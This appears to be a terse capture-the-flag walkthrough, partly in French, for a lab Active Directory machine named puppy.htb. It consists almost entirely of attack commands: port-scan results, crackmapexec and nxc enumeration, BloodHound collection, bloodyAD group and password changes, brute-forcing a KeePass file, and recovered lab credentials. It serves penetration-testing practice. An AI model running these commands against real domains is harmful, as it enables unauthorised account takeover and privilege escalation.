Open 10.10.11.70:53
Open 10.10.11.70:88
Open 10.10.11.70:135
Open 10.10.11.70:139
Open 10.10.11.70:389
Open 10.10.11.70:445
Open 10.10.11.70:464
Open 10.10.11.70:593
Open 10.10.11.70:636
Open 10.10.11.70:2049
Open 10.10.11.70:111
Open 10.10.11.70:3269
Open 10.10.11.70:3268
Open 10.10.11.70:3260
Open 10.10.11.70:5985
Open 10.10.11.70:9389
Open 10.10.11.70:49664
Open 10.10.11.70:49667
Open 10.10.11.70:49670
Open 10.10.11.70:49669
Open 10.10.11.70:49685
Open 10.10.11.70:60683
Open 10.10.11.70:60711
crackmapexec smb 10.129.72.114 -u 'levi.james' -p 'KingofAkron2025!' --shares
Partages découverts :
ADMIN$ Remote Admin
C$ Default share
DEV DEV-SHARE for PUPPY-DEVS
IPC$ READ
NETLOGON READ
SYSVOL READ
crackmapexec smb 10.129.72.114 -u 'levi.james' -p 'KingofAkron2025!' --users
nxc smb puppy.htb -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
bloodhound-python -dc dc.puppy.htb -u 'levi.james' -p 'KingofAkron2025!' -d puppy.htb -c All -o bloodhound_results.json -ns 10.129.72.114
Ajout de l’utilisateur au groupe DEV :
bloodyAD --host 10.129.158.58 -d puppy.htb -u levi.james -p 'KingofAkron2025!' add groupMember DEVELOPERS levi.james
Récupération du fichier recovery.kbdx :
Utilisation de keepass4brute :
./keepass4brute.sh recovery.kbdx wordlist.txt
Identifiants trouvés : ant.edwards : Antman2025!
bloodyAD --host 10.129.158.58 -d puppy.htb -u ant.edwards -p 'Antman2025!' get writable --detail
Changement de mot de passe :
bloodyAD --host "10.129.158.58" -d puppy.htb -u "ant.edwards" -p 'Antman2025!' set password "adam.silver" "Password@987"
Désactivation du flag ACCOUNTDISABLE :
bloodyAD -u ant.edwards -d puppy.htb -p 'Antman2025!' --host 10.129.158.58 remove uac adam.silver -f ACCOUNTDISABLE
Fichier contenant les credentials :
cat puppy/nms-auth-config.xml.bak
...
bind-dn>cn=steph.cooper,dc=puppy,dc=htb
bind-password>ChefSteph2025!
Thanks, Artemis Community 🛡️